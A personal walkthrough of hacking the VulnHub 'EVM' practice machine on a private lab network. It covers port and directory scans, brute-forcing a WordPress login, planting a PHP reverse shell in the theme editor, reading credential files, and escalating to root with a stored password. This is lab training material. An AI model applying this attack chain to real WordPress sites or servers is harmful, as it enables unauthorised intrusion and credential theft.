VulnHub EVM
5 June, 2021
Machine Link: https://www.vulnhub.com/entry/evm-1,391/
Beginning with an nmap scan
$ sudo nmap -A -sC -sV -O -p 1-20000 192.168.56.126
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.56.126
Host is up (0.0010s latency).
Not shown: 19993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING UIDL AUTH-RESP-CODE RESP-CODES CAPA TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ ID LOGINDISABLEDA0001 Pre-login IMAP4rev1 more have LOGIN-REFERRALS post-login ENABLE listed capabilities OK IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:12:CB:9D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: ubuntu-extermely-vulnerable-m4ch1ine
| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
| Domain name: \x00
| FQDN: ubuntu-extermely-vulnerable-m4ch1ine
|_ System time: 2021-06-04T15:00:20-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-04T19:00:20
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.01 ms 192.168.56.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.03 seconds
Running gobuster against the website showed that there is a /wordpress endpoint
$ ./gobuster dir -r -u http://192.168.56.126/ -w wordlists/common.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.126/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 293]
/.hta.php (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 298]
/.htpasswd.php (Status: 403) [Size: 302]
/.htaccess.php (Status: 403) [Size: 302]
/index.html (Status: 200) [Size: 10821]
/info.php (Status: 200) [Size: 82935]
/info.php (Status: 200) [Size: 82936]
/server-status (Status: 403) [Size: 302]
/wp-config.php (Status: 500) [Size: 0]
/wordpress (Status: 200) [Size: 15076]
===============================================================
Finished
===============================================================
wpscan found an author c0rrupt3d_brain and two plugins that stood out
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] c0rrupt3d_brain
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] photo-gallery
| Location: http://192.168.56.126/wordpress/wp-content/plugins/photo-gallery/
| Last Updated: 2021-04-06T13:39:00.000Z
| Readme: http://192.168.56.126/wordpress/wp-content/plugins/photo-gallery/readme.txt
| [!] The version is out of date, the latest version is 1.5.71
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/photo-gallery/, status: 200
|
| Version: 1.5.34 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/photo-gallery/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/photo-gallery/readme.txt
[+] wp-responsive-thumbnail-slider
| Location: http://192.168.56.126/wordpress/wp-content/plugins/wp-responsive-thumbnail-slider/
| Last Updated: 2021-04-02T16:05:00.000Z
| Readme: http://192.168.56.126/wordpress/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
| [!] The version is out of date, the latest version is 1.1.7
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/wp-responsive-thumbnail-slider/, status: 200
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.126/wordpress/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt
One of the comments on the site mentioned that login credentials can be bruteforced
So I tried with the rockyou.txt list and found a password
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0rrupt3d_brain / 24992499
Trying c0rrupt3d_brain / 24992499 Time: 00:04:53 < > (10700 / 14355092) 0.07% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0rrupt3d_brain, Password: 24992499
For some reason, the remote host on the WordPress pages would be same as the host I'm viewing the page from and not the actual host serving the site, so I had to setup a tunnel between the my machine and the vulnerable machine using socat
sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP4:192.168.56.126:80
Using the credentials I was able to login to /wp-admin. I checked the 404 PHP template in the theme editor and it had a message
this is intensely left blank you can upload your php-shell-code here
So that's exactly what I did and got a reverse shell!
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.126] 33136
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
03:44:18 up 2:50, 0 users, load average: 0.00, 0.04, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:113::/var/run/dbus:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bind:x:111:118::/var/cache/bind:/bin/false
postfix:x:112:120::/var/spool/postfix:/bin/false
dovecot:x:113:122:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:114:123:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:116:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
libvirt-qemu:x:64055:112:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:117:126:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
rooter:x:1000:1000:root3r,,,:/home/rooter:/bin/bash
Found some DB credentials in wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'hackme_wp' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', '123' );
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'vulnwp' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', '123' );
I couldn't find anything on the MySQL instance so I ran linpeas, some interesting output
[+] Finding *password* or *credential* files in home (limit 70)
/home/root3r/.root_password_ssh.txt
# Postgres was running
[+] PostgreSQL version and pgadmin credentials
Version: psql (PostgreSQL) 9.5.7
Found readable /etc/postgresql/9.5/main/postgresql.conf
log_timezone = 'localtime'
stats_temp_directory = '/var/run/postgresql/9.5-main.pg_stat_tmp'
datestyle = 'iso, mdy'
timezone = 'localtime'
default_text_search_config = 'pg_catalog.english'
Apparently the root password was present as a text file, it didn't work with ssh but did with su
<ulnerable-m4ch1ine:/home/root3r$ cat /home/root3r/.root_password_ssh.txt
willy26
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ su root
su root
Password: willy26
root@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r# whoami
whoami
root
root@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r# cd /root
cd /root
root@ubuntu-extermely-vulnerable-m4ch1ine:~# ls
ls
proof.txt
root@ubuntu-extermely-vulnerable-m4ch1ine:~# cat proof.txt
cat proof.txt
voila you have successfully pwned me :) !!!
:D